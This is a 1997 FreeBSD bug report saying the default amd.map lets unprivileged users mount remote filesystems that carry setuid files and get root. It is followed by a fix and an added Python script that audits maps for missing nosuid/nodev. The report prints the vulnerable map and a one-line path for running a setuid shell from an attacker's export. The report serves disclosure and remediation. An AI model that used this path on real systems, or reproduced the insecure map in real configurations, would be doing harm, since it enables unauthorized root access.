From watanabe@crayon.planet.kobe-u.ac.jp  Wed Jun 11 00:23:55 1997
Received: from crayon.planet.kobe-u.ac.jp (crayon.planet.kobe-u.ac.jp [133.30.50.177])
          by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id AAA07322
          for <FreeBSD-gnats-submit@freebsd.org>; Wed, 11 Jun 1997 00:20:05 -0700 (PDT)
Received: (from watanabe@localhost) by crayon.planet.kobe-u.ac.jp (8.8.5/3.5Wpl7-sub) id QAA26419; Wed, 11 Jun 1997 16:14:06 +0900 (JST)
Message-Id: <199706110714.QAA26419@crayon.planet.kobe-u.ac.jp>
Date: Wed, 11 Jun 1997 16:14:06 +0900 (JST)
From: Takeshi WATANABE <watanabe@crayon.planet.kobe-u.ac.jp>
Reply-To: watanabe@komadori.planet.kobe-u.ac.jp
To: FreeBSD-gnats-submit@freebsd.org
Subject: The sample /etc/amd.map has a security hole.
X-Send-Pr-Version: 3.2

>Number:         3846
>Category:       misc
>Synopsis:       The sample /etc/amd.map has a security hole.
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-bugs
>State:          closed
>Quarter:
>Keywords:
>Date-Required:
>Class:          change-request
>Submitter-Id:   current-users
>Arrival-Date:   Wed Jun 11 00:30:01 PDT 1997
>Closed-Date:    Sun Nov 9 21:24:42 PST 1997
>Last-Modified:  Sun Nov  9 21:25:22 PST 1997
>Originator:     Takeshi WATANABE
>Release:        FreeBSD 2.2.1-RELEASE i386
>Organization:
Kobe University, Kobe, Japan
>Environment:

	All machines which use "amd" with the default /etc/amd.map

>Description:

  The default /etc/amd.map has a serious security hole.

=-=-=-=
/defaults   type:=host;fs:=${autodir}/${rhost};rhost:=${key}
*           opts:=rw,grpid
=-=-=-=

  If we use this map file, a non-privileged user can mount any remote file
systems that the remote machines export.  If the remote file system contains
dangerous SetUID executable files or world-writable device files, the
non-privileged user can execute or read them.  So, he/she can easily get root
authority.

  When the "amd" mount point of this map file is "/net", the cracker can
become root; he/she only has to execute the following.

	/net/crackers.host.machine/.../setuid-shell

(where crackers.host.machine exports /...)

>How-To-Repeat:

	Always.

>Fix:

  We should change /etc/amd.map!  The following lines are one sample.

=-=-=-=
/defaults          type:=host;fs:=${autodir}/${rhost};rhost:=${key}
#my.friend.machine opts:=rw,grpid
*                  opts:=rw,grpid,nosuid,nodev
=-=-=-=

We should use "nosuid" and "nodev" for "*".

       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
              Takeshi WATANABE (watanabe@komadori.planet.kobe-u.ac.jp)
                            Graduate School of Science and Technology,
                               Kobe University   Nada, Kobe 657, Japan
>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->closed 
State-Changed-By: jkh 
State-Changed-When: Sun Nov 9 21:24:42 PST 1997 
State-Changed-Why:  
Fix applied, thanks! 
>Unformatted:
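
Added example (not part of the original report or of FreeBSD's code): a Python check that reads an amd map and lists every entry whose effective mount options lack "nosuid" or "nodev", run against the two maps quoted in the report. It assumes a simplified reading of the map syntax (a key, whitespace-separated locations, ";"-separated var:=value items, /defaults inherited unless an entry overrides it); parse_map and audit are hypothetical names.

```python
import re

REQUIRED = ("nosuid", "nodev")

# Constructed sample inputs: the two maps quoted in the report above.
ORIGINAL_MAP = """\
/defaults   type:=host;fs:=${autodir}/${rhost};rhost:=${key}
*           opts:=rw,grpid
"""
FIXED_MAP = """\
/defaults          type:=host;fs:=${autodir}/${rhost};rhost:=${key}
#my.friend.machine opts:=rw,grpid
*                  opts:=rw,grpid,nosuid,nodev
"""

def parse_map(text):
    """Return {key: [{var: value}, ...]}, one dict per location (simplified syntax)."""
    text = re.sub(r"\\\n\s*", "", text)  # join backslash-continued lines
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        key, *locations = line.split()
        parsed = []
        for loc in locations:
            if loc == "||":
                continue  # cut operator between location groups, carries no options
            items = loc.lstrip("-").split(";")
            parsed.append(dict(i.split(":=", 1) for i in items if ":=" in i))
        entries[key] = parsed
    return entries

def audit(text):
    """Return [(key, missing_options)] for locations mounted without nosuid/nodev."""
    entries = parse_map(text)
    defaults = {}
    for loc in entries.pop("/defaults", []):
        defaults.update(loc)
    findings = []
    for key, locations in entries.items():
        for loc in locations or [{}]:  # an entry with no location uses /defaults
            opts = {**defaults, **loc}.get("opts", "").split(",")
            missing = [o for o in REQUIRED if o not in opts]
            if missing:
                findings.append((key, missing))
    return findings

if __name__ == "__main__":
    for name, text in (("original", ORIGINAL_MAP), ("fixed", FIXED_MAP)):
        print(name, audit(text) or "ok")
```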
